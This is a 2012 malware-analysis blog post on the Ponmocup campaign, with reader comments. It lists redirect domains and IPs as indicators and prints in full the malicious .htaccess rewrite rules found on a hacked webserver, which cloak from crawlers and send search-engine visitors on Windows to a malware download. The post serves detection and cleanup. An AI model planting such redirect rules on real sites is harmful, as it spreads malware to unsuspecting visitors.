Thursday, March 8, 2012

Ponmocup, lots changed, but not all

Updated on 2012-03-09 (see at the end and list of domains below)

Updated on 2012-03-15 (list of domains below)

Updated on 2012-04-14 (more info, links to IOC and ref's at end)

So here goes another post about the Ponmocup malware. Lots of things changed recently, but not all (luckily for defenders).

First, for those who are not yet familiar with the infection steps here a quick overview. A user searches for something using a web search engine, e.g. Google. He clicks on a link leading to an infected website. But the infection is not on certain pages as (obfuscated) scripts, but instead the ".htaccess" file was changed. It checks the referer and the user-agent of a visitor and if checks are OK it sends back a 302-redirect and sets a cookie. The intermediate redirection server sends back another 302-redirect to another server, which delivers the malware executable. It's an EXE or COM file with the search query terms as filename.

Previously, the first redirection step was using a "/cgi-bin/r.cgi" pattern which was detected by this snort rule (2013181). Here's an example from 2011-08-03.

Just recently I discovered that this pattern changed at least since 2012-01-24. The first redirection now looks very much like that from a Google search result (/url?sa=...). Here's an example of the new infection pattern from 2012-03-07. (Sample with pwd "infected")

I submitted the sample to VT and some online analysis services. Here's a GFI Sandbox report [PDF]. As you can see in this report, lots of indicators are still the same (although some are randomized). The registry key mentioned in my previous post is still set. That's still one constant (and easy) indicator to detect an infection. The hosts file doesn't seem to be changed anymore.

The C2 traffic after an infection changed a lot, too, so most old snort rules won't detect it anymore.
Here's some "OSINT research" I've done in late November last year.
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-domains-IPs-MD5-date.txt
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-domains-more-details-full.txt
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-more-details-full.txt

For more details about previous research please see the main page and excuse the bad formatting! (I just wanted to put that info somewhere fast & quick)

Now if you were just looking for some new network indicators, here's a list of observed malware redirect domains and IPs:

176.53.112.107
176.53.112.108
178.211.33.202
178.211.33.203
77.79.11.96

*.3d-tablet.cc
*.aabathlift.com
*.akitahusky.com
*.akitahusky.net
*.akitahusky.org
*.albinopleco.com
*.bapiescafe.com
*.customshowerdoorsc.com
*.dancearkansas.com
*.ilyanet.info
*.peachtreepropainters.biz
*.peachtreepropainters.com
*.peachtreepropainters.info
*.peachtreepropainters.net
*.puritanhardrive.com
*.soroki.info
*.thepetserver.com
*.vicandbarbs.net

Thanks Kenneth (@Patories / blog) for adding to this list! (added 2012-03-09)

*.3d-tablet.biz
*.3d-tablet.me
*.3d-tablet.tv
*.appliancerecyclingportland.com
*.crisisice.com
*.entrygrid.com
*.iphone-yes.us
*.jennyswanepoel.com
*.kingoftheaquarium.com
*.learn2drive4free.com
*.nosilentnight.com
*.ns.themahoganylife.com
*.p-ballgames.com
*.pballgames.com
*.perfectgameproductions.biz
*.reefclown.com
*.suncoastintegration.com
*.thesubtleactivist.com
*.thomasyohannan.com
*.travel-yes.com

argumenthistorical.org
besidesdream.com
capitalinformer.com
dmjxluffloundering.info
dutytraditional.net
dvmsoft.eu
earlyanswered.com
formedtouch.com
gtracking.org
interestingchapter.net
jesusonlynet.org
khyiftcrusher.info
nbeegclassics.info
oorvyvwdeciphers.info
reportedtechniques.org
sahnespender.com
sqpgksbweathering.info
szentkoronaradio.com
teethalong.org
travelmeant.net
twiceseparate.com
underbuild.net
virtualmapping.org
watchingsquare.com

*.bankingonbankers.com
109.236.80.151

added 2012-03-15:

*.stephanized.info / 176.53.112.107

*.b12capitalpartners.com / 109.236.80.187



The previous lists of domains have not been updated with new ones (yet).
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-History_2012-02-20.txt
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-IPs_2012-02-20.html

Now who will create some snort rules or IOCs out of this?

Let's go ;-)


Updated on 2012-03-09:

First let me clear somethig up. The infection does not exploit any vulnerability, except the "human" using social engineering. The user searching for some query terms is lured to open the downloaded malware executable due to the query terms in the file name. So fully patched Windows systems are vulnerable, if executable files can be downloaded from the Internet.

The user does not need to have admin priviledges on the system to get infected. For non-admins "only" the current user running the malware executable gets infected.

Now let's take another look at the first step of infection, the redirection URLs from the infected ".htaccess" file on a hacked webserver. I believe the .htaccess files are manipulated using stolen (FTP or other) logins to these webservers.

I got hold of such a .htaccess file and located the malicious "code". The 33 lines of code are well hidden in the middle of the over 3,000 lines long file, which is really hard to find ;-) (end of sarcasm)

$ wc -l htaccess.txt
3094 htaccess.txt

$ egrep -n " " htaccess.txt wc -l
33

$ egrep -n " " htaccess.txt
1513:
1515:RewriteEngine On
1517:RewriteCond %{REQUEST_METHOD} ^GET$
1519:RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpresstwittweetflickr\.linkedingoogle\.yahoo\.bing\.msn\.ask\.excite\.a
ltavista\.netscape\.aol\.hotbot\.goto\.infoseek\.mamma\.alltheweb\.lycos\.metacrawler\.mail\.dogpile\?).*$ [NC]
1521:RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
1523:RewriteCond %{HTTP_USER_AGENT} !^.*(bingAccoonaAce\sExplorerAmfibiAmiga\sOSapacheappieAppleSyndication).*$ [NC]
1525:RewriteCond %{HTTP_USER_AGENT} !^.*(ArchiveArgusAsk\sJeevesasteriasAtrenko\sNewsBeOSBigBlogZoo).*$ [NC]
1527:RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).*$ [NC]
1529:RewriteCond %{HTTP_USER_AGENT} !^.*(BookmarkbotCE\-PreloadCFNetworkcococCombineCrawlcurlDanger\shiptop).*$ [NC]
1531:RewriteCond %{HTTP_USER_AGENT} !^.*(DiagnosticsDTAAgentEmeraldShieldendoEvaalEverest\-Vulcan).*$ [NC]
1533:RewriteCond %{HTTP_USER_AGENT} !^.*(exactseekFeedFetchfindlinksFreeBSDFriendsterFuck\sYouGoogle).*$ [NC]
1535:RewriteCond %{HTTP_USER_AGENT} !^.*(GregariusHatenaScreenshotheritrixHolyCowDudeHonda\-SearchHP\-UX).*$ [NC]
1537:RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).*$ [NC]
1539:RewriteCond %{HTTP_USER_AGENT} !^.*(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).*$ [NC]
1541:RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurfLinuxLiveJournalLonoponoLotus\-NotesLycosLynxMac\_PowerPC).*$ [NC]
1543:RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPCMac\s10Mac\sOSmacDNMacintoshMediapartnersMegiteMetaProducts).*$ [NC]
1545:RewriteCond %{HTTP_USER_AGENT} !^.*(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).*$ [NC]
1547:RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).*$ [NC]
1549:RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).*$ [NC]
1551:RewriteCond %{HTTP_USER_AGENT} !^.*(os\=MacP900ipanscientperlPlayStationPOE\-ComponentPrivacyFinder).*$ [NC]
1553:RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeries\s60).*$ [NC]
1555:RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReaderSiteBarSlurpSnoopySoap\sClientSocialmarksSphere\sScout).*$ [NC]
1557:RewriteCond %{HTTP_USER_AGENT} !^.*(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).*$ [NC]
1559:RewriteCond %{HTTP_USER_AGENT} !^.*(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).*$ [NC]
1561:RewriteCond %{HTTP_USER_AGENT} !^.*(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWin\s9x).*$ [NC]
1563:RewriteCond %{HTTP_USER_AGENT} !^.*(Win16Win95Win98Windows\s95Windows\s98Windows\sCEWindows\sNT\s4).*$ [NC]
1565:RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).*$ [NC]
1567:RewriteCond %{HTTP_USER_AGENT} !^.*(YandexYetiYouReadMeZhuaxiaZyBorg).*$ [NC]
1569:RewriteCond %{REQUEST_FILENAME} !.*jpg$.*gif$.*png.*jpeg.*mpg.*avi.*zip.*gz.*tar.*ico$ [NC]
1571:RewriteCond %{HTTP_COOKIE} !^.*ejJ.*$ [NC]
1573:RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
1575:RewriteCond %{HTTPS} ^off$
1577:RewriteRule ^(.*)$ http://%{REMOTE_PORT}.puritanhardrive.com/url?sa=X&source=web&cd=39&ved=0FLFQWdF5&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZItfKzI4Ki3pI2JzVAz9Je1pw==&usg=pyT9z9Cp7DU5572d38ywx9&sig2=bDduChtXGT22SxV5UI2D8H [R=302,L,CO=ejJ:43:%{HTTP_HOST}:10549:/:0:HttpOnly]


As you can see (and mostly mentioned before), the referrer, user-agent and cookie are checked and only if all conditions match the redirection to the malware server is sent back.

The malware domain and parameters of the redirection URL (sa, source, cd, ved, url, ei, usg, sig2) are random on each infected webserver, but are constant on each server for every redirect (except for the "url" parameter). Samples are in this list.

A new discovery is that the subdomain of the redirection domains (starting with "*." in the list of domains above) are the source port of the TCP connection and thus should be between 1025 and 65535. So looking for 4-5 digits subdomains could help discover new such redirection domains not yet known or registered.

If you find this info useful, spread the word (or link) ;-)

Updated on 2012-04-14

Lots of A/V seem very ineffective detecting this malware. Check out this analysis from a couple months ago:
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt

Checking for a couple registry keys should be an easy way to detect infected systems. Here's an IOC that should do this:
http://ioc.forensicartifacts.com/2012/04/ponmocup-2/
https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet

I would be really interested to hear if you get hits (positive or false) on this IOC. Thanks for any feedback.

4 comments:

  1. you sir are a life saver. We have been having some trouble with our webpage redericting to some malware sites for a couple of months and we couldnt find where the problem was. Until i found this article, thank you so much.

    ReplyDelete
    Replies
    1. Thank you Saito Waru for kind comment :)

      Delete
  2. Thank you but I wasn't clear ... If I had this, would there be malware download by my website via exploited .htaccess to my site's visitors' computers?

    ReplyDelete
  3. Cory,

    all visitors to your site using a search engine would be served a malware executable (from another server, not yours). If the user opened the malware exe it would infect his computer and download further malware from other servers.
    So yes, as long as this .htaccess file was on your webserver, your visitors (from search einges) were exposed to malware.
    (Important note: this malware is not exploiting a vulnerability in browser plugins as lots of exploit kits for drive-by infections do. It's using social engineering, naming the malware with the search query words. So it can infect a fully patched system with non-admin user as well!)

    You can check this yourself using an online service:

    http://urlquery.net/
    (click "advanced settings")
    Profile URL: http://www.your-website.com/
    Referrer: http://www.google.ch/url?q=random+search-terms

    http://wepawet.iseclab.org/
    is another service where you could do the same (incl. Referrer).

    If your a little tech savvy you could do the same using WGET as shown here:
    http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt

    On either one you could see the redirect to some malware serving URL as desribed in my blog.

    ReplyDelete